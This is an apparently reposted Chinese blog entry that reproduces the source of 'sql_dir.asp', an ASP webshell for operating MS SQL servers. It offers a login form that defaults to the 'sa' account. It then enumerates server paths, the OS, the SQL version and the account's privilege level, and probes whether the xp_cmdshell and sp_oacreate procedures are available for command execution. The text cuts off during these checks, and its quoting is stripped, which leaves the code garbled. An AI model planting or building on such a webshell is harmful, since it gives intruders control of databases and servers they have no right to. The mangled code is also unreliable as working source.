mssql操作用webshell--sql_dir.asp

　　摘自：WowoS Blog

　　<title>SQL_Dir By Bin</title>
<style id=theStyle>
BODY {
FONT-SIZE: 9pt;
COLOR: #000000;
background-color: #ffffff;
FONT-FAMILY: Courier New;
scrollbar-face-color:#E4E4F3;
scrollbar-highlight-color:#FFFFFF;
scrollbar-3dlight-color:#E4E4F3;
scrollbar-darkshadow-color:#9C9CD3;
scrollbar-shadow-color:#E4E4F3;
scrollbar-arrow-color:#4444B3;
scrollbar-track-color:#EFEFEF;
}
TABLE {
FONT-SIZE: 9pt;
FONT-FAMILY: Courier New;
BORDER-COLLAPSE: collapse;
border-width: 1px;
border-top-style: solid;
border-right-style: none;
border-bottom-style: none;
border-left-style: solid;
border-color: #d8d8f0;
}
.tr {
font-family: Courier New;
font-size: 9pt;
background-color: #e4e4f3;
text-align: center;
}
.td {
height: 24px;
font-size: 9pt;
background-color: #f9f9fd;
font-family: Courier New;
}
input {
font-family: Courier New;
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}
textarea {
font-family: Courier New;
BORDER-WIDTH: 1px;
FONT-SIZE: 12px;
color: #000000;
}
A:visited {
FONT-SIZE: 9pt;
COLOR: #333333;
FONT-FAMILY: Courier New;
TEXT-DECORATION: none;
}
A:active {
FONT-SIZE: 9pt;
COLOR: #3366cc;
FONT-FAMILY: Courier New;
TEXT-DECORATION: none;
}
A:link {
FONT-SIZE: 9pt;
COLOR: #000000;
FONT-FAMILY: Courier New;
TEXT-DECORATION: none;
}
A:hover {
FONT-SIZE: 9pt;
COLOR: #3366cc;
FONT-FAMILY: Courier New;
TEXT-DECORATION: none;
}
tr {
font-family: Courier New;
font-size: 9pt;
line-height: 18px;
}
td {
font-size: 9pt;
font-family: Courier New;
border-width: 1px;
border-top-style: none;
border-right-style: solid;
border-bottom-style: solid;
border-left-style: none;
border-color: #d8d8f0;
}
.trHead {
font-family: Courier New;
height: 2px;
background-color: #e4e4f3;
line-height: 2px;
}

　　.fixSpan {
overflow: hidden;
white-space: nowrap;
text-overflow: ellipsis;
vertical-align: baseline;
}

　　.fixTable {
word-break: break-all;
word-wrap: break-word;
}

　　#fileList span{
width: 120px;
line-height: 23px;
cursor: hand;
overflow: hidden;
padding-left: 5px;
white-space: nowrap;
text-overflow: ellipsis;
vertical-align: baseline;
border: 1px solid #ffffff;
}
</style>
<%if session(login)= then%>
<%
Echo <body onload=document.formx.pass.focus();>
Echo <table width=816 align=center>
Echo <form method=post name=formx action=?action=login>
Echo <tr>
Echo <td align=center class=td>数 据 库 连 接</td>
Echo </tr>
Echo <tr>
Echo <td height=75 align=center>
Echo IP：<input name=ip type=text style=border:1px solid #d8d8f0;background-color:#ffffff; value=localhost>
Echo PORT：<input name=port type=text style=border:1px solid #d8d8f0;background-color:#ffffff; value=1433>
Echo USER：<input name=user type=text style=border:1px solid #d8d8f0;background-color:#ffffff; value=sa>
Echo PASS：<input name=pass type=text style=border:1px solid #d8d8f0;background-color:#ffffff;>
Echo </td>
Echo </tr>
Echo <tr>
Echo <td align=center class=td><input type=submit value=LOGIN style=border:1px solid #d8d8f0;background-color:#f9f9fd;></td>
Echo </tr>
Echo <tr>
Echo <td align=center class=td>2007 @ SQL_DIR By Bin <br><a href=
Echo </tr>
Echo </form>
Echo </table>
Echo </body>

　　%>

　　
<%End If %>
<%
If request(action)=login Then
SqlLocalName =request.Form(ip),request.Form(port) 连接IP [ 本地用 (local) 外地用IP ]
SqlUserName =request.Form(user) 用户名
SqlPassword =request.Form(pass) 用户密码
SqlDatabaseName=sql数据库名
ConnStr = Provider=Sqloledb;User ID= SqlUserName ; Password= SqlPassword ; Initial CataLog = SqlDatabaseName ; Data Source= SqlLocalName ;
SqlNowString=GetDate()
On Error Resume Next 容错
Conn.open ConnStr
If Err.number=-2147467259 Then
Echo <script language=javascript> alert(主机IP或者端口连接错误，请检查!);history.back(); </script>
ElseIf Err.number=-2147217843 Then
Echo <script language=javascript> alert(用户名或者密码错误，请检查!);history.back(); </script>
End If
If Err.number=0 Then
session(login)=yes
session(user)=request.Form(user)
session(pass)=request.Form(pass)
session(ip)=request.Form(ip)
session(port)=request.Form(port)
End If
response.redirect?action=tools
End If
%>

　　<%

　　
If request(action)=tools or request(action)= Then

　　If session(login)=yes Then
%>
<%
rem----------------------------数据库连接-----------------
ConnStr = Provider=Sqloledb.1;User ID= session(user) ; Password= session(pass) ; Initial CataLog = SqlDatabaseName ; Data Source= session(ip) ,session(port);
Set Conn=Server.CreateObject(ADODB.Connection)
Conn.open ConnStr
Set Cat = Server.CreateObject(ADOX.Catalog)
Cat.ActiveConnection = conn.ConnectionString
rem------------------------函数-------------
Sub Echo(sStr)
Response.Write sStr
End Sub

　　Function IIf(var, val1, val2)
If var = True Then IIf = val1 Else IIf = val2
End Function
const copyright = Code By Bin<br><a href =
RootPath = Server.MapPath(/)
Path=Request.ServerVariables(PATH_TRANSLATED)
Server_Name=Request.ServerVariables(SERVER_NAME)
IP=Request.ServerVariables(LOCAL_ADDR)
PORT=Request.ServerVariables(SERVER_PORT)
OS= Request.ServerVariables(OS)
OS= IIf(OS = , Windows2003, OS) , Request.ServerVariables(SERVER_SOFTWARE)
OS= OS , ScriptEngine / ScriptEngineMajorVersion . ScriptEngineMinorVersion . ScriptEngineBuildVersion
Curl=Request.ServerVariables(SCRIPT_NAME)
RequestUrl=Request.ServerVariables(Url)
URL=

　　rem--------------------------------------

　　
rem-----------------------数据库操作--------------------
Set rs = conn.execute(select @@version)
SQLversion=rs(0)
Set rs = Conn.execute(select db_name(0))
DBname=rs(0)
Set rs = Conn.execute(select user)
DBuser=rs(0)
权限判断
Set rs = Conn.execute(Select IS_SRVROLEMEMBER(sysadmin))
If rs(0)=1 Then
dbo=sa
End If
Set rs = Conn.execute(Select IS_MEMBER(db_owner))
If rs(0)=1 Then
dbo=db_owner
Else
dbo=public
End If
扩展判断
Set rs = Conn.execute(select count(*) from master.dbo.sysobjects where xtype=X and name=xp_cmdshell)
If rs(0)=1 Then
xp_cmdshell=XP_cmdshell √
Else
xp_cmdshell=XP_cmdshell ×
End If
Set rs = Conn.execute(select count(*) from master.dbo.sysobjects where xtype=X and name=sp_oacreate)
If rs(0)=1 Then
sp_oacreate=SP_oacreate √